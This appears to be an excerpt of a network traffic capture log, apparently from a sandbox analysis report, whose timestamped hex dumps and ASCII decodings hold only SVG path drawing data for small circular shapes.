                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7867INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7888INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7904INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7920INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7936INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7952INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                          Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7968INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7987INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8006INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8022INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8038INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8054INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8070INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8086INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8104INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8122INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8138INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
